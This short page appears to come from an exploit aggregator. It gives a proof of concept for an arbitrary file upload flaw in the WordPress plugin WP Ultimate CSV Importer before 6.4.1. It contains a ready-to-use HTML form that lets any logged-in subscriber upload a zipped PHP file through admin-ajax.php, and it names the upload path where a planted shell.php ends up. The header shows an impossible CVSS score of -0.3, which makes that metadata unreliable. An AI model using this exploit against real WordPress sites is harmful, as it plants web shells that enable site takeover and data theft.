Exploit for WP Ultimate CSV Importer < 6.4.1 - Subscriber+ Arbitrary File Upload

Name: Exploit for WP Ultimate CSV Importer < 6.4.1 - Subscriber+ Arbitrary File Upload
Rating: 5 (206 reviews)

2022-01-12 | CVSS -0.3

## https://sploitus.com/exploit?id=WPEX-ID:64BD22E2-EA38-4B6F-BE54-E81F9E77BDC2
As any authenticated user, such as a simple subscriber

<html>
<body>
  <form method="POST" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="zip_upload"/>
    Zipped PHP File
    <input type="file" name="zipFile"/><br/><br/>
    <input type="submit" value="Upload"/>
  </form>
</body>


The extracted files will be in wp-content/uploads/YEAR/MONTH/, e.g: wp-content/uploads/2022/01/shell.php